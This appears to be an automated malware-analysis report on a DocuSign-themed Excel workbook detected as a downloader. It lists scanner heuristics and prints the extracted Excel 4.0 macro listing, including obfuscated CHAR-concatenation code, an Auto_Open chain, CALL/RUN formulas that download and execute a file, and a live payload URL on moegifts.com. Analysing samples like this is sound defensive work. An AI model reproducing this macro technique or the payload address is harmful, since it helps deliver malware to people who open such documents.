MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous functions like RUN and ShellExecute. This indicates the macro is designed to execute external commands. The embedded URL suggests a download or redirection to a malicious resource. The ClamAV detection further supports its malicious nature as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.Docusign0521-9864805-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
URL reconstructed from XLM cell array (1 URL) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://moegifts.com/ds/161120.gif� Referenced by macro
- https://moegifts.com/ds/161120.gifReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txtb74fbb14c9dd0283fe5b35630158622cf58bbddcd03d161d30bf64d1f40271a4 |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 7889 bytes |
Preview scriptFirst 1,000 lines of the extracted script
' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d 8 !A50
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' 8 ,HX77,"CALL("Ke"& 8 !BX61&"32","Cr"& 8 !BX72&"yA","JCJ", DocuSig!IP362,0)",""
' 8 ,HX78,"CALL("Ke"& 8 !CC63&"32","Cr"& 8 !CC74&"yA","JCJ", DocuSig!IP362& DocuSig!IP377,0)",""
' 8 ,HX79,RUN(A205),""
' 8 ,A94,RUN(B104),""
' 8 ,B104,RUN(HX77),""
' 8 ,B200,"https://"&C201&D202&E203,""
' 8 ,A205,"CALL("U"& DocuSig!IU404,"U"& DocuSig!IU367,"IICCII",0,B200, DocuSig!IP362& DocuSig!IP377& DocuSig!IP391,0,0)",""
' 8 ,A206,"CALL( DocuSig!IT426, DocuSig!IF355,"IICCCCI",0, DocuSig!IU394, DocuSig!IP362& DocuSig!IP377& DocuSig!IP391,,0,0)",""
' 8 ,A207,HALT(),""
' 8 ,IF355,CONCATENATE(IF356&IF357&IF358&IF359&IF360&IF361&IF362&IF363&IF364&IF365&IF366&IF367&IF368),""
' 8 ,IF356,CHAR(IG356+IH356+II356),""
' 8 ,IF357,CHAR(IG357+IH357+II357),""
' 8 ,IF358,CHAR(IG358+IH358+II358),""
' 8 ,IF359,CHAR(IG359-IH359-II359),""
' 8 ,IF360,CHAR(IG360-IH360-II360),""
' 8 ,IF361,CHAR(IG361-IH361-II361),""
' 8 ,IF362,CHAR(IG362-IH362-II362),""
' 8 ,IP362,"CONCATENATE(IP363,IP364,IP365,IP366,IP367,IP368,IP369,IP370,IP371)",""
' 8 ,IF363,CHAR(IG363-IH363+II363),""
' 8 ,IP363,CHAR(IQ363+IR363+IS363),""
' 8 ,IF364,CHAR(IG364-IH364+II364),""
' 8 ,IP364,CHAR(IQ364+IR364+IS364),""
' 8 ,IF365,CHAR(IG365-IH365+II365),""
' 8 ,IP365,CHAR(IQ365+IR365+IS365),""
' 8 ,IF366,CHAR(IG366+IH366-II366),""
' 8 ,IP366,CHAR(IQ366+IR366-IS366),""
' 8 ,IF367,CHAR(IG367+IH367-II367),""
' 8 ,IP367,CHAR(IQ367+IR367-IS367),""
' 8 ,IU367,"CONCATENATE(IU369,IU370,IU371,IU372,IU373,IU374,IU375,IU376,IU377,IU378,IU379,IU380,IU381,IU382,IU383,IU384,IU385)",""
' 8 ,IF368,CHAR(IG368+IH368-II368),""
' 8 ,IP368,CHAR(IQ368+IR368-IS368),""
' 8 ,IU368,CHAR(IV368+IW368+IX368),""
' 8 ,IP369,CHAR(IQ369-IR369+IS369),""
' 8 ,IU369,CHAR(IV369+IW369+IX369),""
' 8 ,IP370,CHAR(IQ370-IR370+IS370),""
' 8 ,IU370,CHAR(IV370+IW370+IX370),""
' 8 ,IP371,CHAR(IQ371-IR371+IS371),""
' 8 ,IU371,CHAR(IV371-IW371-IX371),""
' 8 ,IU372,CHAR(IV372-IW372-IX372),""
' 8 ,IU373,CHAR(IV373-IW373-IX373),""
' 8 ,IU374,CHAR(IV374+IW374-IX374),""
' 8 ,IU375,CHAR(IV375+IW375-IX375),""
' 8 ,IU376,CHAR(IV376+IW376-IX376),""
' 8 ,IP377,"CONCATENATE(IP378,IP379,IP380,IP381,IP382,IP383,IP384)",""
' 8 ,IU377,CHAR(IV377-IW377+IX377),""
' 8 ,IP378,CHAR(IQ378-IR378-IS378),""
' 8 ,IU378,CHAR(IV378-IW378+IX378),""
' 8 ,IP379,CHAR(IQ379-IR379-IS379),""
' 8 ,IU379,CHAR(IV379-IW379+IX379),""
' 8 ,IP380,CHAR(IQ380-IR380-IS380),""
' 8 ,IU380,CHAR(IV380+IW380+IX380),""
' 8 ,IP381,CHAR(IQ381-IR381+IS381),""
' 8 ,IU381,CHAR(IV381+IW381+IX381),""
' 8 ,IP382,CHAR(IQ382-IR382+IS382),""
' 8 ,IU382,CHAR(IV382+IW382+IX382),""
' 8 ,IP383,CHAR(IQ383-IR383+IS383),""
' 8 ,IU383,CHAR(IV383-IW383-IX383),""
' 8 ,IP384,CHAR(IQ384-IR384+IS384),""
' 8 ,IU384,CHAR(IV384-IW384-IX384),""
' 8 ,IU385,CHAR(IV385-IW385-IX385),""
' 8 ,IP391,"CONCATENATE(IP392,IP393,IP394,IP395,IP396,IP397,IP398,IP399,IP400,IP401,IP402,IP403,IP404)",""
' 8 ,IP392,[],""
' 8 ,IP393,[],""
' 8 ,IP394,[],""
' 8 ,IU394,CONCATENATE(IU395&IU396&IU397&IU398),""
' 8 ,IP395,[],""
' 8 ,IU395,CHAR(IV395+IW395-IX395),""
' 8 ,IP396,[],""
' 8 ,IU396,CHAR(IV396+IW396-IX396),""
' 8 ,IP397,[],""
' 8 ,IU397,CHAR(IV397-IW397+IX397),""
' 8 ,IP398,[],""
' 8 ,IU398,CHAR(IV398-IW398+IX398),""
' 8 ,IP399,[],""
' 8 ,IP400,[],""
' 8 ,IP401,[],""
' 8 ,IP402,[],""
' 8 ,IP403,[],""
' 8 ,IP404,[],""
' 8 ,IU404,"CONCATENATE(IU406,IU407,IU408,IU409,IU410)",""
' 8 ,IU405,CHAR(IV405+IW405+IX405),""
' 8 ,IU406,CHAR(IV406+IW406+IX406),""
' 8 ,IU407,CHAR(IV407+IW407+IX407),""
' 8 ,IU408,CHAR(IV408-IW408-IX408),""
' 8 ,IU409,CHAR(IV409-IW409-IX409),""
' 8 ,IU410,CHAR(IV410-IW410-IX410),""
' 8 ,IT426,CONCATENATE(IT427&IT428&IT429&IT430&IT431&IT432&IT433),""
' 8 ,IT427,CHAR(IU427+IV427+IW427),""
' 8 ,IT428,CHAR(IU428+IV428+IW428),""
' 8 ,IT429,CHAR(IU429+IV429+IW429),""
' 8 ,IT430,CHAR(IU430+IV430+IW430),""
' 8 ,IT431,CHAR(IU431-IV431-IW431),""
' 8 ,IT432,CHAR(IU432-IV432-IW432),""
' 8 ,IT433,CHAR(IU433-IV433-IW433),""
' 8 ,BX61,CONCATENATE(BX64&BX65&BX66&BX67),""
' 8 ,CB61,"",1.00000000000000000000
' 8 ,BX62,CHAR(BY62+BZ62+CA62),""
' 8 ,BX63,CHAR(BY63+BZ63+CA63),""
' 8 ,CC63,CONCATENATE(CC66&CC67&CC68&CC69),""
' 8 ,BX64,CHAR(BY64+BZ64+CA64),""
' 8 ,CC64,CHAR(CD64+CE64+CF64),""
' 8 ,BX65,CHAR(BY65+BZ65+CA65),""
' 8 ,CC65,CHAR(CD65+CE65+CF65),""
' 8 ,BX66,CHAR(BY66-BZ66-CA66),""
' 8 ,CC66,CE66,""
' 8 ,BX67,CHAR(BY67-BZ67-CA67),""
' 8 ,CC67,CHAR(CD67+CE67+CF67),""
' 8 ,BX68,CHAR(BY68-BZ68+CA68),""
' 8 ,CC68,CHAR(CD68+CE68+CF68),""
' 8 ,BX69,CHAR(BY69-BZ69+CA69),""
' 8 ,CC69,CHAR(CD69+CE69+CF69),""
' 8 ,CC70,CHAR(CD70+CE70+CF70),""
' 8 ,CC71,CHAR(CD71+CE71+CF71),""
' 8 ,BX72,CONCATENATE(BX75&BX76&BX77&BX78&BX79&BX80&BX81&BX82&BX83&BX84&BX85&BX86),""
' 8 ,BX73,[],""
' 8 ,BX74,[],""
' 8 ,CC74,CONCATENATE(CC77&CC78&CC79&CC80&CC81&CC82&CC83&CC84&CC85&CC86&CC87&CC88),""
' 8 ,BX75,[],""
' 8 ,CC75,CHAR(CD75+CE75+CF75),""
' 8 ,BX76,[],""
' 8 ,CC76,CHAR(CD76+CE76+CF76),""
' 8 ,BX77,[],""
' 8 ,CC77,CHAR(CD77+CE77+CF77),""
' 8 ,BX78,[],""
' 8 ,CC78,CHAR(CD78+CE78+CF78),""
' 8 ,BX79,[],""
' 8 ,CC79,CHAR(CD79-CE79-CF79),""
' 8 ,BX80,[],""
' 8 ,CC80,CHAR(CD80-CE80-CF80),""
' 8 ,BX81,[],""
' 8 ,CC81,CHAR(CD81-CE81-CF81),""
' 8 ,BX82,[],""
' 8 ,CC82,CHAR(CD82-CE82-CF82),""
' 8 ,BX83,[],""
' 8 ,CC83,CHAR(CD83+CE83-CF83),""
' 8 ,BX84,[],""
' 8 ,CC84,CHAR(CD84+CE84-CF84),""
' 8 ,BX85,[],""
' 8 ,CC85,CHAR(CD85+CE85-CF85),""
' 8 ,BX86,[],""
' 8 ,CC86,CHAR(CD86+CE86-CF86),""
' 8 ,BX87,[],""
' 8 ,CC87,CHAR(CD87-CE87+CF87),""
' 8 ,BX88,[],""
' 8 ,CC88,CHAR(CD88-CE88+CF88),""
' 8 ,CC89,CHAR(CD89-CE89+CF89),""
' 8 ,CC90,CHAR(CD90-CE90+CF90),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.